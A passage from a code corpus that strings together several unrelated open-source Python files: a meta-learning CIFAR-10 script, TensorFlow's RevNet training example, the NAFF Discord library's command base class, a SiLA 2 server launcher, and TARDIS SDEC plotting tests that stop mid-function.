self.layers[f'mat_{i}'] = MetaLinear(inp_size, layer_size)
inp_size = layer_size
self.layers['final_mat'] = MetaLinear(inp_size, 10)
self.layers = nn.ModuleDict(self.layers)
self.activation = nn.Sigmoid()
self.loss = nn.NLLLoss()
def all_named_parameters(self):
return [(k, v) for k, v in self.named_parameters()]
def forward(self, loss):
inp, out = loss.sample()
inp = w(Variable(inp.view(inp.size()[0], 3*32*32)))
out = w(Variable(out))
cur_layer = 0
while f'mat_{cur_layer}' in self.layers:
inp = self.activation(self.layers[f'mat_{cur_layer}'](inp))
cur_layer += 1
inp = F.log_softmax(self.layers['final_mat'](inp), dim=1)
l = self.loss(inp, out)
return l
from resnet_meta import resnet50
class CIFAR10ResNet(MetaModule):
def __init__(self):
super().__init__()
self.net = resnet50()
self.loss = nn.CrossEntropyLoss()
def all_named_parameters(self):
return [(k, v) for k, v in self.named_parameters()]
def forward(self, loss):
inp, out = loss.sample()
inp = w(Variable(inp.view(inp.size()[0], 3, 32, 32)))
out = w(Variable(out))
inp = self.net(inp)
l = self.loss(inp, out)
return l
loss, CIFAR10_optimizer = fit_optimizer(CIFAR10Loss, CIFAR10Net, lr=0.01, n_epochs=50, n_tests=20, out_mul=0.1, preproc=True, test_target=CIFAR10ResNet)
print(loss) |
the-stack_0_12409 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Eager execution workflow with RevNet train on CIFAR-10."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
from absl import flags
import tensorflow as tf
from tensorflow.contrib.eager.python.examples.revnet import cifar_input
from tensorflow.contrib.eager.python.examples.revnet import config as config_
from tensorflow.contrib.eager.python.examples.revnet import revnet
tfe = tf.contrib.eager
def main(_):
"""Eager execution workflow with RevNet trained on CIFAR-10."""
tf.enable_eager_execution()
config = get_config(config_name=FLAGS.config, dataset=FLAGS.dataset)
ds_train, ds_train_one_shot, ds_validation, ds_test = get_datasets(
data_dir=FLAGS.data_dir, config=config)
model = revnet.RevNet(config=config)
global_step = tf.train.get_or_create_global_step() # Ensure correct summary
global_step.assign(1)
learning_rate = tf.train.piecewise_constant(
global_step, config.lr_decay_steps, config.lr_list)
optimizer = tf.train.MomentumOptimizer(
learning_rate, momentum=config.momentum)
checkpointer = tf.train.Checkpoint(
optimizer=optimizer, model=model, optimizer_step=global_step)
if FLAGS.train_dir:
summary_writer = tf.contrib.summary.create_file_writer(FLAGS.train_dir)
if FLAGS.restore:
latest_path = tf.train.latest_checkpoint(FLAGS.train_dir)
checkpointer.restore(latest_path)
print("Restored latest checkpoint at path:\"{}\" "
"with global_step: {}".format(latest_path, global_step.numpy()))
sys.stdout.flush()
for x, y in ds_train:
train_one_iter(model, x, y, optimizer, global_step=global_step)
if global_step.numpy() % config.log_every == 0:
it_test = ds_test.make_one_shot_iterator()
acc_test, loss_test = evaluate(model, it_test)
if FLAGS.validate:
it_train = ds_train_one_shot.make_one_shot_iterator()
it_validation = ds_validation.make_one_shot_iterator()
acc_train, loss_train = evaluate(model, it_train)
acc_validation, loss_validation = evaluate(model, it_validation)
print("Iter {}, "
"training set accuracy {:.4f}, loss {:.4f}; "
"validation set accuracy {:.4f}, loss {:4.f}"
"test accuracy {:.4f}, loss {:.4f}".format(
global_step.numpy(), acc_train, loss_train, acc_validation,
loss_validation, acc_test, loss_test))
else:
print("Iter {}, test accuracy {:.4f}, loss {:.4f}".format(
global_step.numpy(), acc_test, loss_test))
sys.stdout.flush()
if FLAGS.train_dir:
with summary_writer.as_default():
with tf.contrib.summary.always_record_summaries():
tf.contrib.summary.scalar("Training accuracy", acc_train)
tf.contrib.summary.scalar("Test accuracy", acc_test)
tf.contrib.summary.scalar("Training loss", loss_train)
tf.contrib.summary.scalar("Test loss", loss_test)
if FLAGS.validate:
tf.contrib.summary.scalar("Validation accuracy", acc_validation)
tf.contrib.summary.scalar("Validation loss", loss_validation)
if global_step.numpy() % config.save_every == 0 and FLAGS.train_dir:
saved_path = checkpointer.save(
file_prefix=os.path.join(FLAGS.train_dir, "ckpt"))
print("Saved checkpoint at path: \"{}\" "
"with global_step: {}".format(saved_path, global_step.numpy()))
sys.stdout.flush()
def get_config(config_name="revnet-38", dataset="cifar-10"):
"""Return configuration."""
print("Config: {}".format(config_name))
sys.stdout.flush()
config = {
"revnet-38": config_.get_hparams_cifar_38(),
"revnet-110": config_.get_hparams_cifar_110(),
"revnet-164": config_.get_hparams_cifar_164(),
}[config_name]
if dataset == "cifar-10":
config.add_hparam("n_classes", 10)
config.add_hparam("dataset", "cifar-10")
else:
config.add_hparam("n_classes", 100)
config.add_hparam("dataset", "cifar-100")
return config
def get_datasets(data_dir, config):
"""Return dataset."""
if data_dir is None:
raise ValueError("No supplied data directory")
if not os.path.exists(data_dir):
raise ValueError("Data directory {} does not exist".format(data_dir))
if config.dataset not in ["cifar-10", "cifar-100"]:
raise ValueError("Unknown dataset {}".format(config.dataset))
print("Training on {} dataset.".format(config.dataset))
sys.stdout.flush()
data_dir = os.path.join(data_dir, config.dataset)
if FLAGS.validate:
# 40k Training set
ds_train = cifar_input.get_ds_from_tfrecords(
data_dir=data_dir,
split="train",
data_aug=True,
batch_size=config.batch_size,
epochs=config.epochs,
shuffle=config.shuffle,
data_format=config.data_format,
dtype=config.dtype,
prefetch=config.batch_size)
# 10k Training set
ds_validation = cifar_input.get_ds_from_tfrecords(
data_dir=data_dir,
split="validation",
data_aug=False,
batch_size=config.eval_batch_size,
epochs=1,
shuffle=False,
data_format=config.data_format,
dtype=config.dtype,
prefetch=config.eval_batch_size)
else:
# 50k Training set
ds_train = cifar_input.get_ds_from_tfrecords(
data_dir=data_dir,
split="train_all",
data_aug=True,
batch_size=config.batch_size,
epochs=config.epochs,
shuffle=config.shuffle,
data_format=config.data_format,
dtype=config.dtype,
prefetch=config.batch_size)
ds_validation = None
# Always compute loss and accuracy on whole test set
ds_train_one_shot = cifar_input.get_ds_from_tfrecords(
data_dir=data_dir,
split="train_all",
data_aug=False,
batch_size=config.eval_batch_size,
epochs=1,
shuffle=False,
data_format=config.data_format,
dtype=config.dtype,
prefetch=config.eval_batch_size)
ds_test = cifar_input.get_ds_from_tfrecords(
data_dir=data_dir,
split="test",
data_aug=False,
batch_size=config.eval_batch_size,
epochs=1,
shuffle=False,
data_format=config.data_format,
dtype=config.dtype,
prefetch=config.eval_batch_size)
return ds_train, ds_train_one_shot, ds_validation, ds_test
def train_one_iter(model, inputs, labels, optimizer, global_step=None):
"""Train for one iteration."""
grads, vars_, logits, loss = model.compute_gradients(
inputs, labels, training=True)
optimizer.apply_gradients(zip(grads, vars_), global_step=global_step)
return logits, loss
def evaluate(model, iterator):
"""Compute accuracy with the given dataset iterator."""
mean_loss = tfe.metrics.Mean()
accuracy = tfe.metrics.Accuracy()
for x, y in iterator:
logits, _ = model(x, training=False)
loss = model.compute_loss(logits=logits, labels=y)
accuracy(
labels=tf.cast(y, tf.int64),
predictions=tf.argmax(logits, axis=1, output_type=tf.int64))
mean_loss(loss)
return accuracy.result().numpy(), mean_loss.result().numpy()
if __name__ == "__main__":
flags.DEFINE_string(
"data_dir", default=None, help="Directory to load tfrecords")
flags.DEFINE_string(
"train_dir",
default=None,
help="[Optional] Directory to store the training information")
flags.DEFINE_boolean(
"restore",
default=False,
help="[Optional] Restore the latest checkpoint from `train_dir` if True")
flags.DEFINE_boolean(
"validate",
default=False,
help="[Optional] Use the validation set or not for hyperparameter search")
flags.DEFINE_string(
"dataset",
default="cifar-10",
help="[Optional] The dataset used; either `cifar-10` or `cifar-100`")
flags.DEFINE_string(
"config",
default="revnet-38",
help="[Optional] Architecture of network. "
"Other options include `revnet-110` and `revnet-164`")
FLAGS = flags.FLAGS
tf.app.run(main)
|
the-stack_0_12411 | from __future__ import annotations
import asyncio
import copy
import functools
import logging
import re
import typing
from typing import Annotated, Awaitable, Callable, Coroutine, Optional, Tuple, Any, TYPE_CHECKING
from naff.client.const import MISSING, logger_name
from naff.client.errors import CommandOnCooldown, CommandCheckFailure, MaxConcurrencyReached
from naff.client.mixins.serialization import DictSerializationMixin
from naff.client.utils.attr_utils import define, field, docs
from naff.client.utils.misc_utils import get_parameters, get_object_name, maybe_coroutine
from naff.client.utils.serializer import no_export_meta
from naff.models.naff.cooldowns import Cooldown, Buckets, MaxConcurrency
from naff.models.naff.protocols import Converter
if TYPE_CHECKING:
from naff.models.naff.context import Context
__all__ = ("BaseCommand", "check", "cooldown", "max_concurrency")
log = logging.getLogger(logger_name)
kwargs_reg = re.compile(r"^\*\*\w")
args_reg = re.compile(r"^\*\w")
@define()
class BaseCommand(DictSerializationMixin):
"""
An object all commands inherit from. Outlines the basic structure of a command, and handles checks.
Attributes:
extension: The extension this command belongs to.
enabled: Whether this command is enabled
checks: Any checks that must be run before this command can be run
callback: The coroutine to be called for this command
error_callback: The coroutine to be called when an error occurs
pre_run_callback: A coroutine to be called before this command is run **but** after the checks
post_run_callback: A coroutine to be called after this command has run
"""
extension: Any = field(default=None, metadata=docs("The extension this command belongs to") | no_export_meta)
enabled: bool = field(default=True, metadata=docs("Whether this can be run at all") | no_export_meta)
checks: list = field(
factory=list, metadata=docs("Any checks that must be *checked* before the command can run") | no_export_meta
)
cooldown: Cooldown = field(
default=MISSING, metadata=docs("An optional cooldown to apply to the command") | no_export_meta
)
max_concurrency: MaxConcurrency = field(
default=MISSING,
metadata=docs("An optional maximum number of concurrent instances to apply to the command") | no_export_meta,
)
callback: Callable[..., Coroutine] = field(
default=None, metadata=docs("The coroutine to be called for this command") | no_export_meta
)
error_callback: Callable[..., Coroutine] = field(
default=None, metadata=no_export_meta | docs("The coroutine to be called when an error occurs")
)
pre_run_callback: Callable[..., Coroutine] = field(
default=None,
metadata=no_export_meta
| docs("The coroutine to be called before the command is executed, **but** after the checks"),
)
post_run_callback: Callable[..., Coroutine] = field(
default=None, metadata=no_export_meta | docs("The coroutine to be called after the command has executed")
)
def __attrs_post_init__(self) -> None:
if self.callback is not None:
if hasattr(self.callback, "checks"):
self.checks += self.callback.checks
if hasattr(self.callback, "cooldown"):
self.cooldown = self.callback.cooldown
if hasattr(self.callback, "max_concurrency"):
self.max_concurrency = self.callback.max_concurrency
def __hash__(self) -> int:
return id(self)
async def __call__(self, context: "Context", *args, **kwargs) -> None:
"""
Calls this command.
Args:
context: The context of this command
args: Any
kwargs: Any
"""
# signals if a semaphore has been acquired, for exception handling
# if present assume one will be acquired
max_conc_acquired = self.max_concurrency is not MISSING
try:
if await self._can_run(context):
if self.pre_run_callback is not None:
await self.pre_run_callback(context, *args, **kwargs)
if self.extension is not None and self.extension.extension_prerun:
for prerun in self.extension.extension_prerun:
await prerun(context, *args, **kwargs)
await self.call_callback(self.callback, context)
if self.post_run_callback is not None:
await self.post_run_callback(context, *args, **kwargs)
if self.extension is not None and self.extension.extension_postrun:
for postrun in self.extension.extension_postrun:
await postrun(context, *args, **kwargs)
except Exception as e:
# if a MaxConcurrencyReached-exception is raised a connection was never acquired
max_conc_acquired = not isinstance(e, MaxConcurrencyReached)
if self.error_callback:
await self.error_callback(e, context, *args, **kwargs)
elif self.extension and self.extension.extension_error:
await self.extension.extension_error(context, *args, **kwargs)
else:
raise
finally:
if self.max_concurrency is not MISSING and max_conc_acquired:
await self.max_concurrency.release(context)
@staticmethod
def _get_converter_function(anno: type[Converter] | Converter, name: str) -> Callable[[Context, str], Any]:
num_params = len(get_parameters(anno.convert))
# if we have three parameters for the function, it's likely it has a self parameter
# so we need to get rid of it by initing - typehinting hates this, btw!
# the below line will error out if we aren't supposed to init it, so that works out
try:
actual_anno: Converter = anno() if num_params == 3 else anno # type: ignore
except TypeError:
raise ValueError(
f"{get_object_name(anno)} for {name} is invalid: converters must have exactly 2 arguments."
) from None
# we can only get to this point while having three params if we successfully inited
if num_params == 3:
num_params -= 1
if num_params != 2:
raise ValueError(
f"{get_object_name(anno)} for {name} is invalid: converters must have exactly 2 arguments."
)
return actual_anno.convert
async def try_convert(self, converter: Optional[Callable], context: "Context", value: Any) -> Any:
if converter is None:
return value
return await maybe_coroutine(converter, context, value)
def param_config(self, annotation: Any, name: str) -> Tuple[Callable, Optional[dict]]:
# This thing is complicated. NAFF-annotations can either be annotated directly, or they can be annotated with Annotated[str, CMD_*]
# This helper function handles both cases, and returns a tuple of the converter and its config (if any)
if annotation is None:
return None
if typing.get_origin(annotation) is Annotated and (args := typing.get_args(annotation)):
for ann in args:
v = getattr(ann, name, None)
if v is not None:
return (ann, v)
return (annotation, getattr(annotation, name, None))
async def call_callback(self, callback: Callable, context: "Context") -> None:
callback = functools.partial(callback, context) # first param must be ctx
parameters = get_parameters(callback)
args = []
kwargs = {}
if len(parameters) == 0:
# if no params, user only wants context
return await callback()
c_args = copy.copy(context.args)
for param in parameters.values():
if isinstance(param.annotation, Converter):
# for any future dev looking at this:
# this checks if the class here has a convert function
# it does NOT check if the annotation is actually a subclass of Converter
# this is an intended behavior for Protocols with the runtime_checkable decorator
convert = functools.partial(
self.try_convert, self._get_converter_function(param.annotation, param.name), context
)
else:
convert = functools.partial(self.try_convert, None, context)
func, config = self.param_config(param.annotation, "_annotation_dat")
if config:
                # if user has used a naff-annotation, run the annotation, and pass the result to the user
local = {"context": context, "extension": self.extension, "param": param.name}
ano_args = [local[c] for c in config["args"]]
if param.kind != param.POSITIONAL_ONLY:
kwargs[param.name] = func(*ano_args)
else:
args.append(func(*ano_args))
continue
elif param.name in context.kwargs:
# if parameter is in kwargs, user obviously wants it, pass it
if param.kind != param.POSITIONAL_ONLY:
kwargs[param.name] = await convert(context.kwargs[param.name])
else:
args.append(await convert(context.kwargs[param.name]))
if context.kwargs[param.name] in c_args:
c_args.remove(context.kwargs[param.name])
elif param.default is not param.empty:
kwargs[param.name] = param.default
else:
if not str(param).startswith("*"):
if param.kind != param.KEYWORD_ONLY:
try:
args.append(await convert(c_args.pop(0)))
except IndexError:
raise ValueError(
f"{context.invoke_target} expects {len([p for p in parameters.values() if p.default is p.empty]) + len(callback.args)}"
f" arguments but received {len(context.args)} instead"
) from None
else:
raise ValueError(f"Unable to resolve argument: {param.name}")
if any(kwargs_reg.match(str(param)) for param in parameters.values()):
# if user has `**kwargs` pass all remaining kwargs
kwargs = kwargs | {k: v for k, v in context.kwargs.items() if k not in kwargs}
if any(args_reg.match(str(param)) for param in parameters.values()):
# user has `*args` pass all remaining args
args = args + [await convert(c) for c in c_args]
return await callback(*args, **kwargs)
async def _can_run(self, context: Context) -> bool:
"""
Determines if this command can be run.
Args:
context: The context of the command
"""
max_conc_acquired = False # signals if a semaphore has been acquired, for exception handling
try:
if not self.enabled:
return False
for _c in self.checks:
if not await _c(context):
raise CommandCheckFailure(self, _c, context)
if self.extension and self.extension.extension_checks:
for _c in self.extension.extension_checks:
if not await _c(context):
raise CommandCheckFailure(self, _c, context)
if self.max_concurrency is not MISSING:
if not await self.max_concurrency.acquire(context):
raise MaxConcurrencyReached(self, self.max_concurrency)
if self.cooldown is not MISSING:
if not await self.cooldown.acquire_token(context):
raise CommandOnCooldown(self, await self.cooldown.get_cooldown(context))
return True
except Exception:
if max_conc_acquired:
await self.max_concurrency.release(context)
raise
def error(self, call: Callable[..., Coroutine]) -> Callable[..., Coroutine]:
"""A decorator to declare a coroutine as one that will be run upon an error."""
if not asyncio.iscoroutinefunction(call):
raise TypeError("Error handler must be coroutine")
self.error_callback = call
return call
def pre_run(self, call: Callable[..., Coroutine]) -> Callable[..., Coroutine]:
"""A decorator to declare a coroutine as one that will be run before the command."""
if not asyncio.iscoroutinefunction(call):
raise TypeError("pre_run must be coroutine")
self.pre_run_callback = call
return call
def post_run(self, call: Callable[..., Coroutine]) -> Callable[..., Coroutine]:
"""A decorator to declare a coroutine as one that will be run after the command has."""
if not asyncio.iscoroutinefunction(call):
raise TypeError("post_run must be coroutine")
self.post_run_callback = call
return call
def check(check: Callable[["Context"], Awaitable[bool]]) -> Callable[[Coroutine], Coroutine]:
"""
Add a check to a command.
Args:
check: A coroutine as a check for this command
"""
def wrapper(coro: Coroutine) -> Coroutine:
if isinstance(coro, BaseCommand):
coro.checks.append(check)
return coro
if not hasattr(coro, "checks"):
coro.checks = []
coro.checks.append(check)
return coro
return wrapper
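# Illustrative usage (hedged; assumes a command decorator such as naff's
# slash_command — any BaseCommand subclass behaves the same way):
#
#   async def is_owner(ctx: "Context") -> bool:
#       return ctx.author.id == 123456789  # hypothetical owner id
#
#   @slash_command(name="admin")
#   @check(is_owner)
#   async def admin_cmd(ctx: "Context") -> None:
#       ...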
def cooldown(bucket: Buckets, rate: int, interval: float) -> Callable[[Coroutine], Coroutine]:
"""
Add a cooldown to a command.
Args:
bucket: The bucket used to track cooldowns
        rate: How many commands may be run per interval
interval: How many seconds to wait for a cooldown
"""
def wrapper(coro: Coroutine) -> Coroutine:
cooldown_obj = Cooldown(bucket, rate, interval)
coro.cooldown = cooldown_obj
return coro
return wrapper
def max_concurrency(bucket: Buckets, concurrent: int) -> Callable[[Coroutine], Coroutine]:
"""
Add a maximum number of concurrent instances to the command.
Args:
bucket: The bucket to enforce the maximum within
concurrent: The maximum number of concurrent instances to allow
"""
def wrapper(coro: Coroutine) -> Coroutine:
max_conc = MaxConcurrency(concurrent, bucket)
coro.max_concurrency = max_conc
return coro
return wrapper
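# Illustrative usage (hedged; assumes the same slash_command decorator and
# Buckets members named USER/GUILD):
#
#   @slash_command(name="ping")
#   @cooldown(Buckets.USER, rate=1, interval=30)
#   @max_concurrency(Buckets.GUILD, concurrent=1)
#   async def ping(ctx: "Context") -> None:
#       ...
#
# Applied below the command decorator, these attach `cooldown` and
# `max_concurrency` to the callback, which BaseCommand.__attrs_post_init__
# then copies onto the command.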
|
the-stack_0_12415 | import logging
from argparse import ArgumentParser
from .server import Server
logger = logging.getLogger(__name__)
def parse_args():
parser = ArgumentParser(prog="contiflowpump_service", description="Start this SiLA 2 server")
parser.add_argument("-a", "--ip-address", default="127.0.0.1", help="The IP address (default: '127.0.0.1')")
parser.add_argument("-p", "--port", type=int, default=50052, help="The port (default: 50052)")
parser.add_argument("--disable-discovery", action="store_true", help="Disable SiLA Server Discovery")
log_level_group = parser.add_mutually_exclusive_group()
log_level_group.add_argument("-q", "--quiet", action="store_true", help="Only log errors")
log_level_group.add_argument("-v", "--verbose", action="store_true", help="Enable verbose logging")
log_level_group.add_argument("-d", "--debug", action="store_true", help="Enable debug logging")
return parser.parse_args()
def start_server(args):
server = Server()
try:
server.start_insecure(args.ip_address, args.port, enable_discovery=not args.disable_discovery)
print(f"Server startup complete, running on {args.ip_address}:{args.port}. Press Enter to stop it")
try:
input()
except KeyboardInterrupt:
pass
finally:
server.stop()
print("Stopped server")
def setup_basic_logging(args):
level = logging.WARNING
if args.verbose:
level = logging.INFO
if args.debug:
level = logging.DEBUG
if args.quiet:
level = logging.ERROR
logging.basicConfig(level=level, format="%(asctime)s:%(levelname)s:%(name)s:%(message)s")
if __name__ == "__main__":
args = parse_args()
setup_basic_logging(args)
start_server(args)
|
the-stack_0_12418 | """Tests for SDEC Plots."""
from tardis.base import run_tardis
import pytest
import pandas as pd
import numpy as np
import os
from copy import deepcopy
from tardis.visualization.tools.sdec_plot import SDECData, SDECPlotter
import astropy.units as u
from matplotlib.collections import PolyCollection
from matplotlib.lines import Line2D
import tables
import re
def make_valid_name(testid):
"""
Sanitize pytest IDs to make them valid HDF group names.
Parameters
----------
testid : str
ID to sanitize.
Returns
-------
testid : str
Sanitized ID.
"""
testid = testid.replace("-", "_")
testid = "_" + testid
return testid
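# Example (computed from the definition above): make_valid_name("virtual-1")
# returns "_virtual_1" -- hyphens become underscores and a leading underscore is
# prepended so the ID can be used as an HDF5 group name below.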
@pytest.fixture(scope="module")
def simulation_simple(config_verysimple, atomic_dataset):
"""
Instantiate SDEC plotter using a simple simulation model.
Parameters
----------
config_verysimple : tardis.io.config_reader.Configuration
Configuration object for a very simple simulation.
atomic_dataset : str or tardis.atomic.AtomData
Atomic data.
Returns
-------
sim: tardis.simulation.base.Simulation
Simulation object.
"""
# Setup simulation configuration using config_verysimple and
# override properties in such a way to make the simulation run faster
config_verysimple.montecarlo.iterations = 3
config_verysimple.montecarlo.no_of_packets = 4000
config_verysimple.montecarlo.last_no_of_packets = -1
config_verysimple.spectrum.virtual.virtual_packet_logging = True
config_verysimple.montecarlo.no_of_virtual_packets = 1
config_verysimple.spectrum.num = 2000
atomic_data = deepcopy(atomic_dataset)
sim = run_tardis(
config_verysimple,
atom_data=atomic_data,
show_convergence_plots=False,
)
return sim
@pytest.fixture(scope="module")
def sdec_ref_data_path(tardis_ref_path):
"""
Return the path to the reference data for the SDEC plots.
Parameters
----------
tardis_ref_path : str
Path to the reference data directory.
Returns
-------
str
Path to SDEC reference data.
"""
return os.path.abspath(os.path.join(tardis_ref_path, "sdec_ref.h5"))
class TestSDECPlotter:
"""Test the SDECPlotter class."""
@pytest.fixture(scope="class", autouse=True)
def create_hdf_file(self, request, sdec_ref_data_path):
"""
Create an HDF5 file object.
Parameters
----------
request : _pytest.fixtures.SubRequest
sdec_ref_data_path : str
Path to the reference data for the SDEC plots.
Yields
-------
h5py._hl.files.File
HDF5 file object.
"""
cls = type(self)
if request.config.getoption("--generate-reference"):
cls.hdf_file = tables.open_file(sdec_ref_data_path, "w")
else:
cls.hdf_file = tables.open_file(sdec_ref_data_path, "r")
yield cls.hdf_file
cls.hdf_file.close()
@pytest.fixture(scope="class")
def plotter(self, simulation_simple):
"""
Create a SDECPlotter object.
Parameters
----------
simulation_simple : tardis.simulation.base.Simulation
Simulation object.
Returns
-------
tardis.visualization.tools.sdec_plot.SDECPlotter
"""
return SDECPlotter.from_simulation(simulation_simple)
@pytest.fixture(scope="class")
def observed_spectrum(self):
"""
Return the observed spectrum.
Returns
-------
Tuple of two astropy.units.quantity.Quantity values.
"""
test_data = np.loadtxt(
"tardis/visualization/tools/tests/data/observed_spectrum_test_data.dat"
)
observed_spectrum_wavelength, observed_spectrum_flux = test_data.T
observed_spectrum_wavelength = observed_spectrum_wavelength * u.AA
observed_spectrum_flux = (
observed_spectrum_flux * u.erg / (u.s * u.cm ** 2 * u.AA)
)
return observed_spectrum_wavelength, observed_spectrum_flux
@pytest.mark.parametrize("species", [["Si II", "Ca II", "C", "Fe I-V"]])
def test_parse_species_list(self, request, plotter, species):
"""
Test _parse_species_list method.
Parameters
----------
request : _pytest.fixtures.SubRequest
plotter : tardis.visualization.tools.sdec_plot.SDECPlotter
species : list
"""
plotter._parse_species_list(species)
subgroup_name = make_valid_name(request.node.callspec.id)
if request.config.getoption("--generate-reference"):
group = self.hdf_file.create_group(
self.hdf_file.root,
name=subgroup_name,
)
self.hdf_file.create_carray(
group, name="_full_species_list", obj=plotter._full_species_list
)
self.hdf_file.create_carray(
group, name="_species_list", obj=plotter._species_list
)
self.hdf_file.create_carray(
group, name="_keep_colour", obj=plotter._keep_colour
)
pytest.skip("Reference data was generated during this run.")
else:
group = self.hdf_file.get_node("/" + subgroup_name)
# because plotter._full_species_list is an array of strings
np.testing.assert_equal(
np.asarray(plotter._full_species_list),
self.hdf_file.get_node(group, "_full_species_list")
.read()
.astype(str),
)
np.testing.assert_allclose(
np.asarray(plotter._species_list),
self.hdf_file.get_node(group, "_species_list"),
)
np.testing.assert_allclose(
np.asarray(plotter._keep_colour),
self.hdf_file.get_node(group, "_keep_colour"),
)
@pytest.mark.parametrize("packets_mode", ["virtual", "real"])
@pytest.mark.parametrize("packet_wvl_range", [[500, 9000] * u.AA])
@pytest.mark.parametrize("distance", [10 * u.Mpc, 50 * u.Mpc])
@pytest.mark.parametrize("nelements", [1, 3])
def test_calculate_plotting_data(
self,
request,
plotter,
packets_mode,
packet_wvl_range,
distance,
nelements,
):
"""
Test _calculate_plotting_data method.
Parameters
----------
request : _pytest.fixtures.SubRequest
plotter : tardis.visualization.tools.sdec_plot.SDECPlotter
packets_mode : str
packet_wvl_range : astropy.units.quantity.Quantity
distance : astropy.units.quantity.Quantity
nelements : int
"""
plotter._calculate_plotting_data(
packets_mode, packet_wvl_range, distance, nelements
)
# each group is a different combination of arguments
subgroup_name = make_valid_name(request.node.callspec.id)
if request.config.getoption("--generate-reference"):
group = self.hdf_file.create_group(
self.hdf_file.root,
name=subgroup_name,
)
self.hdf_file.create_carray(
group,
name="plot_frequency_bins",
obj=plotter.plot_frequency_bins.cgs.value,
)
self.hdf_file.create_carray(
group,
name="plot_wavelength",
obj=plotter.plot_wavelength.cgs.value,
)
self.hdf_file.create_carray(
group,
name="plot_frequency",
obj=plotter.plot_frequency.cgs.value,
)
self.hdf_file.create_carray(
group,
name="packet_wvl_range_mask",
obj=plotter.packet_wvl_range_mask,
)
self.hdf_file.create_carray(
group, name="emission_species", obj=plotter.emission_species
)
self.hdf_file.create_carray(
group, name="absorption_species", obj=plotter.absorption_species
)
self.hdf_file.create_carray(
group,
name="modeled_spectrum_luminosity",
obj=plotter.modeled_spectrum_luminosity.cgs.value,
)
if isinstance(plotter.lum_to_flux, u.quantity.Quantity):
self.hdf_file.create_array(
group, name="lum_to_flux", obj=plotter.lum_to_flux.cgs.value
)
else:
self.hdf_file.create_array(
group, name="lum_to_flux", obj=plotter.lum_to_flux
)
self.hdf_file.create_carray(
group, name="species", obj=plotter.species.astype(np.float64)
)
plotter.absorption_luminosities_df.to_hdf(
self.hdf_file.filename,
key=f"{subgroup_name}/absorption_luminosities_df",
)
plotter.emission_luminosities_df.to_hdf(
self.hdf_file.filename,
key=f"{subgroup_name}/emission_luminosities_df",
)
plotter.total_luminosities_df.to_hdf(
self.hdf_file.filename,
key=f"{subgroup_name}/total_luminosities_df",
)
pytest.skip("Reference data was generated during this run.")
else:
# use the subgroup id to iterate over the hdf file
group = self.hdf_file.get_node("/" + subgroup_name)
np.testing.assert_allclose(
plotter.plot_frequency_bins.cgs.value,
self.hdf_file.get_node(group, "plot_frequency_bins"),
)
np.testing.assert_allclose(
plotter.plot_wavelength.cgs.value,
self.hdf_file.get_node(group, "plot_wavelength"),
)
np.testing.assert_allclose(
plotter.plot_frequency.cgs.value,
self.hdf_file.get_node(group, "plot_frequency"),
)
np.testing.assert_allclose(
plotter.modeled_spectrum_luminosity.cgs.value,
self.hdf_file.get_node(group, "modeled_spectrum_luminosity"),
)
np.testing.assert_allclose(
plotter.packet_wvl_range_mask,
self.hdf_file.get_node(group, "packet_wvl_range_mask"),
)
np.testing.assert_allclose(
plotter.absorption_species,
self.hdf_file.get_node(group, "absorption_species"),
)
np.testing.assert_allclose(
plotter.emission_species,
self.hdf_file.get_node(group, "emission_species"),
)
if isinstance(plotter.lum_to_flux, u.quantity.Quantity):
                assert (
                    plotter.lum_to_flux.cgs.value
                    == self.hdf_file.get_node(group, "lum_to_flux")
                )
else:
assert plotter.lum_to_flux == self.hdf_file.get_node(
group, "lum_to_flux"
)
np.testing.assert_allclose(
plotter.species.astype(np.float64),
self.hdf_file.get_node(group, "species"),
)
pd.testing.assert_frame_equal(
plotter.absorption_luminosities_df,
pd.read_hdf(
self.hdf_file.filename,
key=f"{subgroup_name}/absorption_luminosities_df",
),
)
pd.testing.assert_frame_equal(
plotter.emission_luminosities_df,
pd.read_hdf(
self.hdf_file.filename,
key=f"{subgroup_name}/emission_luminosities_df",
),
)
pd.testing.assert_frame_equal(
plotter.total_luminosities_df,
pd.read_hdf(
self.hdf_file.filename,
key=f"{subgroup_name}/total_luminosities_df",
),
)
@pytest.mark.parametrize("packets_mode", ["virtual", "real"])
@pytest.mark.parametrize("packet_wvl_range", [[500, 9000] * u.AA, None])
@pytest.mark.parametrize("distance", [10 * u.Mpc, None])
@pytest.mark.parametrize("show_modeled_spectrum", [True, False])
@pytest.mark.parametrize("nelements", [1, None])
@pytest.mark.parametrize(
"species_list", [["Si II", "Ca II", "C", "Fe I-V"], None]
)
def test_generate_plot_mpl(
self,
request,
plotter,
packets_mode,
packet_wvl_range,
distance,
show_modeled_spectrum,
observed_spectrum,
nelements,
species_list,
):
"""
Test generate_plot_mpl method.
Parameters
----------
request : _pytest.fixtures.SubRequest
plotter : tardis.visualization.tools.sdec_plot.SDECPlotter
packets_mode : str
packet_wvl_range : astropy.units.quantity.Quantity
distance : astropy.units.quantity.Quantity
show_modeled_spectrum : bool
observed_spectrum : tuple of two astropy.units.quantity.Quantity values
nelements : int
species_list : list of str
"""
subgroup_name = make_valid_name("mpl" + request.node.callspec.id)
fig = plotter.generate_plot_mpl(
packets_mode=packets_mode,
packet_wvl_range=packet_wvl_range,
distance=distance,
show_modeled_spectrum=show_modeled_spectrum,
observed_spectrum=observed_spectrum if distance else None,
nelements=nelements,
species_list=species_list,
)
if request.config.getoption("--generate-reference"):
group = self.hdf_file.create_group(
self.hdf_file.root,
name=subgroup_name,
)
self.hdf_file.create_carray(
group, name="_species_name", obj=plotter._species_name
)
self.hdf_file.create_carray(
group, name="_color_list", obj=plotter._color_list
)
fig_subgroup = self.hdf_file.create_group(
group,
name="fig_data",
)
for index, data in enumerate(fig.get_children()):
trace_group = self.hdf_file.create_group(
fig_subgroup,
name="_" + str(index),
)
if isinstance(data.get_label(), str):
self.hdf_file.create_array(
trace_group, name="label", obj=data.get_label().encode()
)
# save artists which correspond to element contributions
if isinstance(data, PolyCollection):
for index, path in enumerate(data.get_paths()):
self.hdf_file.create_carray(
trace_group,
name="path" + str(index),
obj=path.vertices,
)
# save line plots
